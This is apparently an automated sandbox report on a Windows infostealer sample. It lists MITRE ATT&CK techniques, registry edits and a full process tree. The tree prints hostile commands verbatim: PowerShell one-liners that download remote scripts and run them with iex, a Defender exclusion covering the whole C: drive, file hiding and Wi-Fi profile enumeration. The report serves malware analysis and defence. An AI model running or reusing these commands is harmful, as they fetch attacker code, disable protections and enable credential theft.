587deb3ba9d1488c1fe1c802295691fb73ee8380771d856b044b4190c959f49d

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
18/08/2024, 17:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-08-18_e56801a386d54e4645314b27ce3aa371_poet-rat_snatch.exe
Size

14.0MB
MD5

e56801a386d54e4645314b27ce3aa371
SHA1

5a679efd69e80e98bd86f343cfbc2ba696d84993
SHA256

587deb3ba9d1488c1fe1c802295691fb73ee8380771d856b044b4190c959f49d
SHA512

90b4161763b6a59d8155e95f4c32b907900e96bba2b618e445ca6b8a055d1ae399c9190252d9ec736c271689dce04626c0271f4f9c1b54cfd059c196e4eba0b2
SSDEEP

98304:3bnUCnRjtyn8P0JJdTUwtKWqVVsEce5nRd7HMFMtOJOf5psLvf05SbMAUES1YNSL:r5Rjtyn0VVF99MFMY0f5paEMAABqOfS

Score

9^/10

credential_access discovery evasion execution persistence privilege_escalation ransomware spyware stealer

Malware Config

Signatures

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 2 IoCs

flow	pid	Process
15	5020	powershell.exe
17	4316	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
5016	PowerShell.exe
5020	powershell.exe
4316	powershell.exe
1112	powershell.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
1348	netsh.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
14	raw.githubusercontent.com
15	raw.githubusercontent.com
17	raw.githubusercontent.com

Network Service Discovery 1 TTPs 1 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
4920	ARP.EXE

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Thunder_Kitty.jpg"	2024-08-18_e56801a386d54e4645314b27ce3aa371_poet-rat_snatch.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
3672	netsh.exe
4672	netsh.exe

System Network Connections Discovery 1 TTPs 1 IoCs

Attempt to get a listing of network connections.

discovery

System Network Connections Discovery

T1049

pid	Process
1572	NETSTAT.EXE

Gathers network information 2 TTPs 3 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
3524	ipconfig.exe
1572	NETSTAT.EXE
936	ipconfig.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
4744	taskkill.exe

Modifies Control Panel 2 IoCs

evasion

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\Desktop\TileWallpaper = "0"	2024-08-18_e56801a386d54e4645314b27ce3aa371_poet-rat_snatch.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\Desktop\WallpaperStyle = "2"	2024-08-18_e56801a386d54e4645314b27ce3aa371_poet-rat_snatch.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	2024-08-18_e56801a386d54e4645314b27ce3aa371_poet-rat_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	2024-08-18_e56801a386d54e4645314b27ce3aa371_poet-rat_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	2024-08-18_e56801a386d54e4645314b27ce3aa371_poet-rat_snatch.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
5020	powershell.exe
1112	powershell.exe
5016	PowerShell.exe
4316	powershell.exe
5016	PowerShell.exe
5020	powershell.exe
1112	powershell.exe
4316	powershell.exe
4316	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5020	powershell.exe
Token: SeDebugPrivilege	1112	powershell.exe
Token: SeDebugPrivilege	5016	PowerShell.exe
Token: SeDebugPrivilege	4316	powershell.exe
Token: SeDebugPrivilege	4744	taskkill.exe
Token: 33	4732	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	4732	AUDIODG.EXE
Token: SeIncreaseQuotaPrivilege	4316	powershell.exe
Token: SeSecurityPrivilege	4316	powershell.exe
Token: SeTakeOwnershipPrivilege	4316	powershell.exe
Token: SeLoadDriverPrivilege	4316	powershell.exe
Token: SeSystemProfilePrivilege	4316	powershell.exe
Token: SeSystemtimePrivilege	4316	powershell.exe
Token: SeProfSingleProcessPrivilege	4316	powershell.exe
Token: SeIncBasePriorityPrivilege	4316	powershell.exe
Token: SeCreatePagefilePrivilege	4316	powershell.exe
Token: SeBackupPrivilege	4316	powershell.exe
Token: SeRestorePrivilege	4316	powershell.exe
Token: SeShutdownPrivilege	4316	powershell.exe
Token: SeDebugPrivilege	4316	powershell.exe
Token: SeSystemEnvironmentPrivilege	4316	powershell.exe
Token: SeRemoteShutdownPrivilege	4316	powershell.exe
Token: SeUndockPrivilege	4316	powershell.exe
Token: SeManageVolumePrivilege	4316	powershell.exe
Token: 33	4316	powershell.exe
Token: 34	4316	powershell.exe
Token: 35	4316	powershell.exe
Token: 36	4316	powershell.exe
Token: SeIncreaseQuotaPrivilege	4316	powershell.exe
Token: SeSecurityPrivilege	4316	powershell.exe
Token: SeTakeOwnershipPrivilege	4316	powershell.exe
Token: SeLoadDriverPrivilege	4316	powershell.exe
Token: SeSystemProfilePrivilege	4316	powershell.exe
Token: SeSystemtimePrivilege	4316	powershell.exe
Token: SeProfSingleProcessPrivilege	4316	powershell.exe
Token: SeIncBasePriorityPrivilege	4316	powershell.exe
Token: SeCreatePagefilePrivilege	4316	powershell.exe
Token: SeBackupPrivilege	4316	powershell.exe
Token: SeRestorePrivilege	4316	powershell.exe
Token: SeShutdownPrivilege	4316	powershell.exe
Token: SeDebugPrivilege	4316	powershell.exe
Token: SeSystemEnvironmentPrivilege	4316	powershell.exe
Token: SeRemoteShutdownPrivilege	4316	powershell.exe
Token: SeUndockPrivilege	4316	powershell.exe
Token: SeManageVolumePrivilege	4316	powershell.exe
Token: 33	4316	powershell.exe
Token: 34	4316	powershell.exe
Token: 35	4316	powershell.exe
Token: 36	4316	powershell.exe
Token: SeIncreaseQuotaPrivilege	4316	powershell.exe
Token: SeSecurityPrivilege	4316	powershell.exe
Token: SeTakeOwnershipPrivilege	4316	powershell.exe
Token: SeLoadDriverPrivilege	4316	powershell.exe
Token: SeSystemProfilePrivilege	4316	powershell.exe
Token: SeSystemtimePrivilege	4316	powershell.exe
Token: SeProfSingleProcessPrivilege	4316	powershell.exe
Token: SeIncBasePriorityPrivilege	4316	powershell.exe
Token: SeCreatePagefilePrivilege	4316	powershell.exe
Token: SeBackupPrivilege	4316	powershell.exe
Token: SeRestorePrivilege	4316	powershell.exe
Token: SeShutdownPrivilege	4316	powershell.exe
Token: SeDebugPrivilege	4316	powershell.exe
Token: SeSystemEnvironmentPrivilege	4316	powershell.exe
Token: SeRemoteShutdownPrivilege	4316	powershell.exe

Suspicious use of WriteProcessMemory 62 IoCs

description	pid	Process	procid_target
PID 2660 wrote to memory of 4316	2660	2024-08-18_e56801a386d54e4645314b27ce3aa371_poet-rat_snatch.exe	85
PID 2660 wrote to memory of 4316	2660	2024-08-18_e56801a386d54e4645314b27ce3aa371_poet-rat_snatch.exe	85
PID 2660 wrote to memory of 1112	2660	2024-08-18_e56801a386d54e4645314b27ce3aa371_poet-rat_snatch.exe	86
PID 2660 wrote to memory of 1112	2660	2024-08-18_e56801a386d54e4645314b27ce3aa371_poet-rat_snatch.exe	86
PID 2660 wrote to memory of 5020	2660	2024-08-18_e56801a386d54e4645314b27ce3aa371_poet-rat_snatch.exe	88
PID 2660 wrote to memory of 5020	2660	2024-08-18_e56801a386d54e4645314b27ce3aa371_poet-rat_snatch.exe	88
PID 2660 wrote to memory of 5064	2660	2024-08-18_e56801a386d54e4645314b27ce3aa371_poet-rat_snatch.exe	89
PID 2660 wrote to memory of 5064	2660	2024-08-18_e56801a386d54e4645314b27ce3aa371_poet-rat_snatch.exe	89
PID 2660 wrote to memory of 5016	2660	2024-08-18_e56801a386d54e4645314b27ce3aa371_poet-rat_snatch.exe	90
PID 2660 wrote to memory of 5016	2660	2024-08-18_e56801a386d54e4645314b27ce3aa371_poet-rat_snatch.exe	90
PID 2660 wrote to memory of 2704	2660	2024-08-18_e56801a386d54e4645314b27ce3aa371_poet-rat_snatch.exe	91
PID 2660 wrote to memory of 2704	2660	2024-08-18_e56801a386d54e4645314b27ce3aa371_poet-rat_snatch.exe	91
PID 2704 wrote to memory of 4256	2704	cmd.exe	92
PID 2704 wrote to memory of 4256	2704	cmd.exe	92
PID 2660 wrote to memory of 3516	2660	2024-08-18_e56801a386d54e4645314b27ce3aa371_poet-rat_snatch.exe	93
PID 2660 wrote to memory of 3516	2660	2024-08-18_e56801a386d54e4645314b27ce3aa371_poet-rat_snatch.exe	93
PID 2660 wrote to memory of 3024	2660	2024-08-18_e56801a386d54e4645314b27ce3aa371_poet-rat_snatch.exe	94
PID 2660 wrote to memory of 3024	2660	2024-08-18_e56801a386d54e4645314b27ce3aa371_poet-rat_snatch.exe	94
PID 5020 wrote to memory of 4184	5020	powershell.exe	95
PID 5020 wrote to memory of 4184	5020	powershell.exe	95
PID 4184 wrote to memory of 1120	4184	csc.exe	96
PID 4184 wrote to memory of 1120	4184	csc.exe	96
PID 4316 wrote to memory of 1476	4316	powershell.exe	97
PID 4316 wrote to memory of 1476	4316	powershell.exe	97
PID 2660 wrote to memory of 4744	2660	2024-08-18_e56801a386d54e4645314b27ce3aa371_poet-rat_snatch.exe	98
PID 2660 wrote to memory of 4744	2660	2024-08-18_e56801a386d54e4645314b27ce3aa371_poet-rat_snatch.exe	98
PID 1476 wrote to memory of 3108	1476	csc.exe	99
PID 1476 wrote to memory of 3108	1476	csc.exe	99
PID 4316 wrote to memory of 3672	4316	powershell.exe	103
PID 4316 wrote to memory of 3672	4316	powershell.exe	103
PID 4316 wrote to memory of 1460	4316	powershell.exe	106
PID 4316 wrote to memory of 1460	4316	powershell.exe	106
PID 1460 wrote to memory of 2080	1460	net.exe	107
PID 1460 wrote to memory of 2080	1460	net.exe	107
PID 4316 wrote to memory of 1348	4316	powershell.exe	108
PID 4316 wrote to memory of 1348	4316	powershell.exe	108
PID 4316 wrote to memory of 3292	4316	powershell.exe	111
PID 4316 wrote to memory of 3292	4316	powershell.exe	111
PID 4316 wrote to memory of 1632	4316	powershell.exe	112
PID 4316 wrote to memory of 1632	4316	powershell.exe	112
PID 1632 wrote to memory of 1656	1632	net.exe	113
PID 1632 wrote to memory of 1656	1632	net.exe	113
PID 4316 wrote to memory of 3524	4316	powershell.exe	114
PID 4316 wrote to memory of 3524	4316	powershell.exe	114
PID 4316 wrote to memory of 2128	4316	powershell.exe	115
PID 4316 wrote to memory of 2128	4316	powershell.exe	115
PID 2128 wrote to memory of 3116	2128	net.exe	116
PID 2128 wrote to memory of 3116	2128	net.exe	116
PID 4316 wrote to memory of 2828	4316	powershell.exe	117
PID 4316 wrote to memory of 2828	4316	powershell.exe	117
PID 4316 wrote to memory of 1572	4316	powershell.exe	118
PID 4316 wrote to memory of 1572	4316	powershell.exe	118
PID 4316 wrote to memory of 4556	4316	powershell.exe	119
PID 4316 wrote to memory of 4556	4316	powershell.exe	119
PID 4316 wrote to memory of 936	4316	powershell.exe	120
PID 4316 wrote to memory of 936	4316	powershell.exe	120
PID 4316 wrote to memory of 3720	4316	powershell.exe	121
PID 4316 wrote to memory of 3720	4316	powershell.exe	121
PID 4316 wrote to memory of 4920	4316	powershell.exe	122
PID 4316 wrote to memory of 4920	4316	powershell.exe	122
PID 4316 wrote to memory of 4672	4316	powershell.exe	123
PID 4316 wrote to memory of 4672	4316	powershell.exe	123

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3024	attrib.exe

C:\Users\Admin\AppData\Local\Temp\2024-08-18_e56801a386d54e4645314b27ce3aa371_poet-rat_snatch.exe
"C:\Users\Admin\AppData\Local\Temp\2024-08-18_e56801a386d54e4645314b27ce3aa371_poet-rat_snatch.exe"
1⤵
- Sets desktop wallpaper using registry
- Modifies Control Panel
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:2660
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4316
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\glf5fuia\glf5fuia.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1476
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6C37.tmp" "c:\Users\Admin\AppData\Local\Temp\glf5fuia\CSC9D005112193949B280B94D74C9666CC3.TMP"
      4⤵
      PID:3108
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" wlan show profiles
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:3672
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup administrators
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1460
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup administrators
      4⤵
      PID:2080
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" advfirewall show allprofiles
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:1348
- - C:\Windows\system32\whoami.exe
    "C:\Windows\system32\whoami.exe" /all
    3⤵
    PID:3292
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" user
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1632
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user
      4⤵
      PID:1656
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /displaydns
    3⤵
    - Gathers network information
    PID:3524
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2128
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup
      4⤵
      PID:3116
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" startup get command caption
    3⤵
    PID:2828
- - C:\Windows\system32\NETSTAT.EXE
    "C:\Windows\system32\NETSTAT.EXE" -ano
    3⤵
    - System Network Connections Discovery
    - Gathers network information
    PID:1572
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe
    3⤵
    PID:4556
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /all
    3⤵
    - Gathers network information
    PID:936
- - C:\Windows\system32\ROUTE.EXE
    "C:\Windows\system32\ROUTE.EXE" print
    3⤵
    PID:3720
- - C:\Windows\system32\ARP.EXE
    "C:\Windows\system32\ARP.EXE" -a
    3⤵
    - Network Service Discovery
    PID:4920
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" wlan show profile
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:4672
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -C "Add-MpPreference -ExclusionPath 'C:'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1112
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5020
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\r4pt3ymz\r4pt3ymz.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4184
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6A14.tmp" "c:\Users\Admin\AppData\Local\Temp\r4pt3ymz\CSC846F55AA1946405A98AA13EDB8AB249.TMP"
      4⤵
      PID:1120
- C:\Windows\system32\cmd.exe
  cmd.exe /c start facebook.com
  2⤵
  PID:5064
- C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe
  PowerShell -Command "(New-Object -ComObject SAPI.SpVoice).Speak(\"hey hey\")"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5016
- C:\Windows\system32\cmd.exe
  cmd /c rundll32.exe user32.dll,SwapMouseButton
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2704
- - C:\Windows\system32\rundll32.exe
    rundll32.exe user32.dll,SwapMouseButton
    3⤵
    PID:4256
- C:\Windows\system32\cmd.exe
  cmd
  2⤵
  PID:3516
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
  2⤵
  - Views/modifies file attributes
  PID:3024
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM wallpaper32.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4744

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x3ec 0x504
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4732

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery
